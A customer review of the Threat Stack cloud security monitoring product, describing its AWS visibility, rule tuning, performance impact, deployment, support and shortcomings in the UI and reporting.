Our primary use case is security.
Our primary use case is security.
It provides the security team with visibility into parts of the organization that were otherwise difficult to see into. By installing the agent we can get visibility into parts of our infrastructure that we otherwise didn't have access to and couldn't see.
The solution provides us with the ability to gain actionable insights into our cloud infrastructure. It gives us a lot of visibility into what's happening in our AWS accounts. The security team can monitor and provide oversight to the cloud operations team. For example, when new security groups are being created, or ingress and egress points are being created at the network layer, we can ensure that they've been documented, tested, approved, and that they have gone through change-control management; things of this nature which are required for, say, compliance purposes. We can detect and then ensure the controls are in place to close the whole loop of the change-control management process.
We develop a SecOps program around this solution. We're using this application to establish some of the controls as part of a SOC 2 audit, as part of a control environment, as well as PCI.
It is a fantastic tool that gives us a level of comfort knowing that there is not only something that's watching, something that can alert and detect, but also knowing that there's an outsourced operation center that can be an auxiliary part of our security team. That is super-helpful. Having their experience in the Amazon Web Services environment is really great because most of our operations are in Amazon Web Services.
We like the ability of the host security module to monitor the processes running on our servers to help us monitor activity. We want to make sure that there are no bad people on our machines. This has the ability to detect those bad people or bad processes on the machines.
The rules are really great. They give us more visibility and control over what's being triggered. There's a large set of rules that come out-of-the-box. We can customize them and we can create our own rules based on the traffic patterns that we see. The rules did take quite a bit of customization and configuration right off the bat because a lot of the way that we do the release of our code and products creates a significant amount of noise. The real signal, the security signal, would have been lost in all that noise. So we had to customize the rules fairly significantly in order to filter out that noise.
The user interface can be a little bit clunky at times. My enjoyment of the user interface is not 100 percent. We maintain multiple sites, a pre-production site and a production site in different parts of our business. I find myself switching between those sites fairly frequently and I lose track of where I'm at: Am I in the pre-production account or the production account? Sometimes that's a little discouraging. There's a lot of information that needs to be waded through, and the UI just isn't great. They do have a great API. The API has been helpful for us to use as a replacement in many cases for the UI.
The reports aren't very good. We've automated the report generation via the API and replaced almost all the reports that they generate for us using API calls instead.
It has been fairly stable. We've had a few cases where we've internally knocked it over ourselves, but the software itself has been fairly stable.
We haven't had any scalability issues. It has been horizontally scalable for us and they seem to be able to handle our traffic. Our traffic patterns are fairly spiky, and even during high spikes they haven't seemed to be holding us back at all.
The technical support is excellent. We email them very frequently. I don't what they would call this level of support, but it's like post-sales support. We have a technical account representative and we email with this individual very frequently about issues that we're having: rule configuration, how to do X, Y, and Z. Once in a while, they'll escalate an issue to the tech support and in those cases tech support has been super-helpful as well. The two issues that have been escalated to tech support have been handled really quickly and really professionally.
We used basic auditd. It's an open-source auditing framework for the Linux environment. The main reason for switching to Threat Stack is that, while Threat Stack effectively does what auditd does, it gives you a user-interface around it. It gives you a way to view the data, to store the data, to search the data, to write an API around the information, and the ability to put controls and best practices around your AWS account. The auditd solution is there but you have to do a lot of heavy lifting on your own. With a very small security team with limited resources, it made a lot of sense for us economically.
It was a little tricky to bootstrap, it took a little time to get started. Once we did get started it leveled off really quickly.
There are two parts to the setup. There's the setup of the agent and the setup of the Amazon Web Services monitoring part. The AWS monitoring part was really easy. Our operations team found it to be really straightforward. There was a cloud formation stack that they executed against and it was really easy.
The installation of the agent, as well, was fairly simple. However, it is installation of software into a production environment and that creates nervousness for operations teams in terms of stability and performance. Is it going to degrade the performance? Will it cause instability? We went through some significant performance testing, load testing, and actually had to work with their installation teams to get the configurations tuned to match our performance needs.
Out-of-the-box, performance degradation was somewhere north of 15 percent and we had to make changes to the rules to get it down to around three percent performance loss.
The installation was actually fairly easy, but getting to the point where we could actually install and deploy broadly took us a little bit of time.
Our deployment took four to six weeks.
The implementation strategy took into consideration the fact that we have multiple accounts, a pre-production account and a production account. The pre-production account was where we did all the testing initially. We tested the service against the pre-production account for Amazon Web Services. We also installed it against some local Amazon instances and tried it out to see what would happen, and then worked with their team to get the assessment of the performance.
We then worked on tuning and tweaking the rules and then started to work on a production strategy which was installation onto hundreds and hundreds of EC2 instances. Again, we started off fairly slowly, installing onto one instance, measuring and monitoring the performance degradation and working with them on resolving the performance degradation issues. We then did the production operations build-out through the operations flows. They did all that work and then we turned it on.
Once all that was on and enabled, we started to tweak the rule set, and tweaking the rule set took another two to three weeks of pretty solid time because of the way that we deploy our software, there are a lot of shell scripts and shell commands and privileged escalations that are happening to get the software deployed onto servers. Getting all of that stuff excluded out from the findings took quite a while.
The tuning process did take time. The way you deploy software will affect how much tuning you need to do. For example, if you have an immutable Kubernetes cluster, then it's very likely that you won't have to do any tuning at all because there won't be any commands or anything running that is of an abnormal nature. Anything that's happening in your cluster that Threat Stack is detecting would be of abnormal nature. It will be reporting those things and you want to know about them as soon as possible. The way it works isn't in that immutable type of environment. It's very much a case of our having these servers, we deploy new code onto them, and there are a lot of moving parts. It's detecting and responding to a lot of these different moving parts. We have to build into the rules to filter out those moving parts. Otherwise, the rules just become useless.
We did it internally.
I don't know that there's an ROI. We purchased the product that gives operations center oversight. We're basically replacing some FTE-equivalent in that budget pool. In security products, there's never really an ROI, although preventing one breach is like a return on investment.
I'm happy with the amount that we spend for the product that we get and the overall service that we get. It's not cheap, but I'm still happy with the spend.
We didn't evaluate too many other options. I had been talking to the Threat Stack team for some time and had known about the product, its features and functionality. We decided to jump in and make a purchase fairly quickly.
Understand the types of users and behaviors that you have in your environment and whether it's changing all the time or very static. If it's a highly static environment, Threat Stack can be a very easy-to-use, drop-in solution that is going to give you peace of mind. If it is a more complex environment that has a lot of moving parts with a lot of systems administrators logging on and running commands all day and all night, it's going to take you a little bit of time to tune the system to the point where you know what the baseline of activity is so that you know what the malicious behavior might be. So plan on having a little bit of time built into your schedule for that.
We're using their SaaS service. Regarding the solution’s ability to consume alerts and data in third-party tools (via APIs and export into S3 buckets) we haven't used that feature yet. It is something that we're actively looking to do; and similarly for the container and Kubernetes monitoring.
In terms of MTTR, that wasn't the reason for the purchase of this product. The purchase of this product was to get visibility into all the different systems that we have and to know if and when we're being compromised. It wasn't to provide a lower MTTR.
It has probably increased the time to investigate potential attacks, in a somewhat perverse way, because we're actually investigating more stuff than we had before. We're taking a look at more items than we did before, so we're doing more work. By doing that, we're still on the up-slope of the learning curve and we haven't quite leveled off yet. I think that it will eventually level out.
There aren't many people using the solution day-to-day. We have three or four security operators using it day-to-day, looking at alerts coming through. But the operations team is basically waiting for us to say if there are any issues. It's really just the security team looking at it. In terms of deployment and maintenance, they are tasks that were done by somebody and then they moved on and did other things. There's nobody doing this full-time. They're not sitting there all day, every day, at the screen. We're using it when high-severity alerts come through.
We get automated, daily reports from the system. We review those via email and that's about it. We're not in the tool poking around, not very often. It's silently doing its thing in the background.
The product is being used across the enterprise. It's being used pretty much everywhere. We have one little pocket where it hasn't been deployed yet. But across all the different pieces of M&A, different acquisitions that we've made, it's on all of them except for one across our flagship product. We just have one more little pocket to get installed, when we have some operations resources, and then when that's done, it'll be fully deployed everywhere.
This product is a solid eight out of then. The basic core functionality is exceptional. I have a lot of faith and trust in it. The performance is good for what it does, meaning that it doesn't degrade the performance more than I would expect, given the types of things that it's expected to do. The only things that are pulling it down from a ten are the user-interface elements and the reporting which is a little bit weak. There's some room for it to grow and to get better, but otherwise, I think it's a pretty solid product.